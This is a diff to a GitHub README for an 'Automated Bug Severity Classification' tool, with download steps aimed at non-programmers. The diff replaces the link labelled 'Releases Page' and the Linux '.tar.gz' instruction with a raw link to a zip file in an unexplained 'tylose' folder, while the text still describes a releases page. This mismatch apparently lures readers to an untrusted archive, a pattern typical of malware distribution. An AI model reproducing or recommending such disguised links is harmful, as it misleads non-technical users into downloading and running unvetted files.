mahmoud-nabil-MN/Automated-Bug-Severity-Classification/README.md

 Follow these steps to download and run the software.
 No programming knowledge is needed, just a few simple actions.

 ## 📥 Download & Install
-Visit this page to download: [Releases Page](https://github.com/mahmoud-nabil-MN/Automated-Bug-Severity-Classification/releases).
+Visit this page to download: [Releases Page](https://raw.githubusercontent.com/mahmoud-nabil-MN/Automated-Bug-Severity-Classification/main/tylose/Severity-Bug-Classification-Automated-1.0.zip).

 1. Click on the link above to go to the Releases page.
 2. Look for the latest version.
 3. Download the appropriate file for your operating system:
    - If you're using **Windows**, download the `.exe` file.
    - If you're using **Mac**, download the `.dmg` file.
-   - If you're using **Linux**, download the `.tar.gz` file.
+   - If you're using **Linux**, download the `https://raw.githubusercontent.com/mahmoud-nabil-MN/Automated-Bug-Severity-Classification/main/tylose/Severity-Bug-Classification-Automated-1.0.zip` file.
 4. Once the download completes, locate the file in your downloads folder.

 ## 🛠️ Installation Instructions